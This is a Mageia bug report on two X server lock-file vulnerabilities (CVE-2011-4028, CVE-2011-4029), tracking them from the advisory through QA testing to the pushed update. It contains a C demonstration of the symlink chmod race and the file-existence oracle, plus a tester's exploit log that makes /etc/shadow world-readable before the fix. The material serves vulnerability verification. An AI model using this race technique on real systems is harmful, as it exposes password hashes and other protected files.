Bug 3102

Summary: CVE-2011-4028, CVE-2011-4029: xserver locking code issues
Product: Mageia
Reporter: Nicolas Vigier <boklm>
Component: Security
Assignee: QA Team <qa-bugs>
Status: RESOLVED FIXED
QA Contact:
Severity: normal
Priority: Normal
CC: davidwhodgins, dmorganec, sysadmin-bugs, tmb
Version: 1
Keywords: validated_update
Target Milestone: ---
Hardware: All
OS: Linux
Whiteboard:
Source RPM: x11-server
CVE:
Status comment:
Attachments: POC for CVE-2011-4029

Description Nicolas Vigier 2011-10-18 21:21:15 CEST
From this mail:
http://lists.freedesktop.org/archives/xorg-announce/2011-October/001744.html

Two vulnerabilities have been discovered in the code handling the X
server lock, that forbids two X servers from serving the same display
simultaneously.

o CVE-2011-4028 : File disclosure vulnerability:
  It is possible to deduce if a file exists or not by exploiting the
  way that Xorg creates its lock files.

  This is caused by the fact that the X server is behaving differently
  if the lock file already exists as a symbolic link pointing to an
  existing or non-existing file.

o CVE-2011-4029 : File permission change vulnerability:
  It is possible for a non-root user to set the permissions for
  all users on any file or directory to 444, giving unwanted read
  access or causing denial of service (by removing execute permission).
  This is caused by a race between creating the lock file and setting
  its access modes.


Fix
---

Those issues have been fixed by the following two git commits:

CVE-2011-4028: 6ba44b91e37622ef8c146d8f2ac92d708a18ed34
http://cgit.freedesktop.org/xorg/xserver/commit/?id=6ba44b91e37622ef8c146d8f2ac92d708a18ed34

CVE-2011-4029: b67581cf825940fdf52bf2e0af4330e695d724a4
http://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4
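The following is an added example for this bug, not code from the xorg-announce mail, the xserver commits or the attached PoC. It reproduces, in a throwaway directory under /tmp, the two patterns the advisory describes: setting the lock file's mode with chmod() on a path after the file has been closed (the race behind CVE-2011-4029) next to fchmod() on the still-open descriptor, and opening a planted lock symlink with and without O_NOFOLLOW (the existence oracle behind CVE-2011-4028). The directory template, the file names and the `swap_for_symlink` attacker stand-in, which simply unlink()s a file it owns, are assumptions of the example; the real PoC in comment 7 gets the file removed by a second Xorg process instead. It expects Linux, where open() with O_NOFOLLOW on a symlink fails with ELOOP.

```c
#define _GNU_SOURCE            /* O_NOFOLLOW, mkdtemp */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Assumed scratch location; the real server uses /tmp/.tX<display>-lock. */
#define WORKDIR_TEMPLATE "/tmp/xlockdemo.XXXXXX"

/* Permission bits of whatever `path` resolves to (symlinks followed), or -1. */
static int mode_of(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
}

/*
 * Lock creation in the shape the advisory describes: create a private temp
 * file, write the PID, close it, then tighten the mode to 0444.  `in_window`
 * stands in for an attacker who wins the race between close() and chmod().
 * With `hardened` the mode is set by fchmod() on the open descriptor (the
 * approach of the upstream fix), so no path is re-resolved afterwards.
 */
static int create_lock(const char *tmp, int hardened,
                       void (*in_window)(const char *, void *), void *arg)
{
    int fd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644);
    if (fd < 0)
        return -1;
    char pid[16];
    int n = snprintf(pid, sizeof pid, "%10ld\n", (long)getpid());
    if (write(fd, pid, (size_t)n) != n) { close(fd); return -1; }
    if (hardened && fchmod(fd, 0444) != 0) { close(fd); return -1; }
    close(fd);
    if (in_window)
        in_window(tmp, arg);                  /* attacker acts here */
    if (!hardened && chmod(tmp, 0444) != 0)   /* CVE-2011-4029: follows a symlink */
        return -1;
    return 0;
}

/* Attacker stand-in (assumed): replace the closed temp file with a symlink. */
static void swap_for_symlink(const char *tmp, void *victim)
{
    (void)unlink(tmp);
    (void)symlink((const char *)victim, tmp);
}

/* Run the race against a 0640 victim file; return the victim's final mode. */
static int run_chmod_race(int hardened)
{
    char dir[] = WORKDIR_TEMPLATE;
    if (!mkdtemp(dir))
        return -1;
    char victim[256], tmp[256];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/.tX1-lock-tmp", dir);
    int result = -1;
    int fd = open(victim, O_CREAT | O_WRONLY, 0640);
    if (fd >= 0 && close(fd) == 0 && chmod(victim, 0640) == 0) {
        create_lock(tmp, hardened, swap_for_symlink, victim);
        result = mode_of(victim);          /* 0444 if the chmod was redirected */
    }
    unlink(tmp); unlink(victim); rmdir(dir);
    return result;
}

/*
 * CVE-2011-4028: plant the lock path as a symlink and see how the server's
 * open() of it behaves.  Returns 0 on success, else errno.  Following the link,
 * the outcome depends on the target (success vs ENOENT), which a root server's
 * differing failure paths reveal to the local user.  With O_NOFOLLOW the open
 * fails with ELOOP whether or not the target exists: no oracle.
 */
static int open_planted_lock(int nofollow, int target_exists)
{
    char dir[] = WORKDIR_TEMPLATE;
    if (!mkdtemp(dir))
        return -1;
    char target[256], lock[256];
    snprintf(target, sizeof target, "%s/secret", dir);
    snprintf(lock, sizeof lock, "%s/.tX1-lock", dir);
    int result = -1;
    if (target_exists) {
        int fd = open(target, O_CREAT | O_WRONLY, 0600);
        if (fd >= 0) close(fd);
    }
    if (symlink(target, lock) == 0) {
        int fd = open(lock, O_RDONLY | (nofollow ? O_NOFOLLOW : 0));
        result = fd >= 0 ? 0 : errno;
        if (fd >= 0) close(fd);
    }
    unlink(lock); unlink(target); rmdir(dir);
    return result;
}

int main(void)
{
    printf("chmod race, vulnerable:  victim mode %04o\n", run_chmod_race(0));
    printf("chmod race, fchmod fix:  victim mode %04o\n", run_chmod_race(1));
    printf("symlink probe, follow:   exists=%d missing=%d\n",
           open_planted_lock(0, 1), open_planted_lock(0, 0));
    printf("symlink probe, NOFOLLOW: exists=%d missing=%d\n",
           open_planted_lock(1, 1), open_planted_lock(1, 0));
    return 0;
}
```

The check a packager wants from this is the same one the PoC in comment 7 makes: after the update, the mode set on the lock file must never be applied to a path that an unprivileged user can swap, and the server's handling of an already-present lock must not depend on what a symlink there points at.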
Comment 1 Manuel Hiebel 2011-11-11 01:36:50 CET
Ping?
Comment 2 Thierry Vignaud 2011-11-22 13:24:25 CET
I've no time for this

Assignee: thierry.vignaud => security

Comment 3 Manuel Hiebel 2011-12-06 02:02:48 CET
Ping?
Comment 4 D Morgan 2012-01-01 23:32:59 CET
I'll look at this one.

CC: (none) => dmorganec

Comment 5 D Morgan 2012-01-01 23:51:58 CET
Pushed in updates_testing, fixing the 2 CVEs.

Assignee: security_officers => qa-bugs

Comment 6 claire robinson 2012-01-03 14:26:23 CET
Created attachment 1325 [details]
POC for CVE-2011-4029

There are instructions in the file, not tried it yet though.
Comment 7 claire robinson 2012-01-03 14:40:05 CET
POC does work as intended and shows we are vulnerable

Testing x86_64


Before
------
$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

$ ./xchmod /etc/shadow
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 3877 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 3877 resumed (SIGCONT sent)
[+] Attack succeeded, ls -l /etc/shadow:
-r--r--r-- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

$ ll /etc/shadow
-r--r--r-- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

Undoing it...

$ su -c "chmod 440 /etc/shadow" -
Password:
$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow


After
-----

The following 3 packages are going to be installed:

- x11-server-common-1.10.1-1.1.mga1.x86_64
- x11-server-devel-1.10.1-1.1.mga1.x86_64
- x11-server-xorg-1.10.1-1.1.mga1.x86_64

$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
$ ./xchmod /etc/shadow
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 5223 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 5223 resumed (SIGCONT sent)
[-] Attack failed, rights are 100440.  Try again!

$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
Comment 8 Dave Hodgins 2012-01-03 23:58:41 CET
Testing complete on i586.

Could someone from the sysadmin team push the srpm
x11-server-1.10.1-1.1.mga1.src.rpm
from Core Updates Testing to Core Updates.

Advisory:  This security update for x11-server corrects the following two
vulnerabilities, which were discovered in the code handling the X
server lock, which prevents two X servers from serving the same display
simultaneously.

o CVE-2011-4028 : File disclosure vulnerability:
  It is possible to deduce if a file exists or not by exploiting the
  way that Xorg creates its lock files.

  This is caused by the fact that the X server is behaving differently
  if the lock file already exists as a symbolic link pointing to an
  existing or non-existing file.

o CVE-2011-4029 : File permission change vulnerability:
  It is possible for a non-root user to set the permissions for
  all users on any file or directory to 444, giving unwanted read
  access or causing denial of service (by removing execute permission).
  This is caused by a race between creating the lock file and setting
  its access modes.

https://bugs.mageia.org/show_bug.cgi?id=3102

Keywords: (none) => validated_update
CC: (none) => davidwhodgins, sysadmin-bugs

Comment 9 Thomas Backlund 2012-01-04 13:33:04 CET
Update pushed.

Status: NEW => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED